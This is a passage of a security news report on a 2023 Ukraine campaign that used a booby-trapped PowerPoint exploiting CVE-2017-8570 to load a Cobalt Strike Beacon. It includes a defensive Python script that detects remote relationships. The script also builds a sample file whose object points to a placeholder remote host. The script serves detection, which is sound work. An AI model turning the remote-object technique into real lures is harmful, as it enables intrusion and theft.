Military Tank Manual, 2017 Zero-Day Anchor Latest Ukraine Cyberattack


An unknown threat actor targeted government entities in Ukraine toward the end of 2023 using an old Microsoft Office remote code execution (RCE) exploit from 2017 (CVE-2017-8570) as the initial vector and military vehicles as the lure.

The threat actor initiated the attack with a malicious PowerPoint file (.PPSX) sent as an attachment in a message on the secure messaging platform Signal. The file masqueraded as an old US Army instruction manual for mine-clearing blades fitted to tanks, but in fact contained a remote relationship, an external reference inside the document package, pointing to a script hosted on the domain of a Russian virtual private server (VPS) provider and fronted by Cloudflare.

According to a Deep Instinct blog post on the attack this week, that script executed the CVE-2017-8570 exploit to achieve RCE, with information theft as the apparent goal.
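A defender's triage check for the lure format described above, added here as an example and not code from the article or from Deep Instinct: a PPSX is an OOXML zip, and the "remote relationship" lives in its `.rels` parts as a `Relationship` with `TargetMode="External"`. The script walks every relationships part and flags external targets fetched over HTTP(S), excluding ordinary hyperlinks, which are legitimately common in slide decks. The sample package and its placeholder URL are constructed for the demonstration.

```python
import io
import re
import zipfile
from xml.etree import ElementTree as ET

REL_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
OFFICE_REL = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/"
HYPERLINK, SLIDE_LAYOUT, OLE_OBJECT = (OFFICE_REL + t for t in ("hyperlink", "slideLayout", "oleObject"))


def external_relationships(package: bytes) -> list[tuple[str, str, str]]:
    """Walk every *.rels part of an OOXML zip (PPSX, PPTX, DOCX, XLSX) and
    return (part name, relationship type, target) for each External relationship."""
    found = []
    with zipfile.ZipFile(io.BytesIO(package)) as zf:
        for name in zf.namelist():
            if not name.endswith(".rels"):
                continue
            root = ET.fromstring(zf.read(name))
            for rel in root.iter(f"{{{REL_NS}}}Relationship"):
                if rel.get("TargetMode", "Internal").lower() == "external":
                    found.append((name, rel.get("Type", ""), rel.get("Target", "")))
    return found


def remote_object_targets(package: bytes) -> list[str]:
    """External targets fetched over HTTP(S) that are not plain hyperlinks.
    Clickable links are normal; an object the document pulls from a remote host
    when opened is not, so these are the ones to quarantine and inspect."""
    return [target for _, rtype, target in external_relationships(package)
            if rtype != HYPERLINK and re.match(r"^https?://", target, re.I)]


def build_sample_ppsx(remote_target: str) -> bytes:
    """Constructed minimal package (not the real lure): one slide whose rels part
    carries a normal layout link, a normal hyperlink, and one remote OLE object."""
    rels = f"""<?xml version="1.0" encoding="UTF-8"?>
<Relationships xmlns="{REL_NS}">
  <Relationship Id="rId1" Type="{SLIDE_LAYOUT}" Target="../slideLayouts/slideLayout1.xml"/>
  <Relationship Id="rId2" Type="{HYPERLINK}" Target="https://example.com/manual" TargetMode="External"/>
  <Relationship Id="rId3" Type="{OLE_OBJECT}" Target="{remote_target}" TargetMode="External"/>
</Relationships>"""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("[Content_Types].xml", '<?xml version="1.0"?><Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types"/>')
        zf.writestr("ppt/slides/slide1.xml", '<?xml version="1.0"?><p:sld xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main"/>')
        zf.writestr("ppt/slides/_rels/slide1.xml.rels", rels)
    return buf.getvalue()


if __name__ == "__main__":
    for url in remote_object_targets(build_sample_ppsx("https://placeholder.invalid/remote-script")):
        print("remote object reference:", url)
```

Point `remote_object_targets` at the bytes of a real attachment to get the list of remote fetches the document would attempt on open; an empty list does not prove a file is clean, only that this particular indicator is absent.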

Underneath the Hood of a Tricky Cyberattack

In terms of the technical nitty-gritty, the obfuscated script masqueraded as a Cisco AnyConnect APN configuration and was responsible for establishing persistence, then decoding and saving the embedded payload to disk, a process carried out in several stages to evade detection.

The payload includes a loader/packer dynamic link library (DLL) named "vpn.sessings" that loads a Cobalt Strike Beacon into memory and awaits instructions from the attacker's command-and-control (C2) server.

Mark Vaitzman, threat lab team leader at Deep Instinct, notes that the penetration testing tool Cobalt Strike is very commonly used by threat actors, but that this particular Beacon uses a custom loader relying on several techniques that slow down analysis.

“It is continuously updated to provide attackers with a simple way to move laterally once the initial footprint is set,” he says. “[And] it was implemented in several anti-analysis and unique evasion techniques.”

Vaitzman notes that in 2022, a severe CVE allowing RCE was found in Cobalt Strike — and many researchers predicted that threat actors would alter the tool to create open source alternatives.

“Several cracked versions can be found on underground hacking forums,” he says.

Beyond the tweaked version of Cobalt Strike, he says, the campaign is also notable for the lengths to which the threat actors…
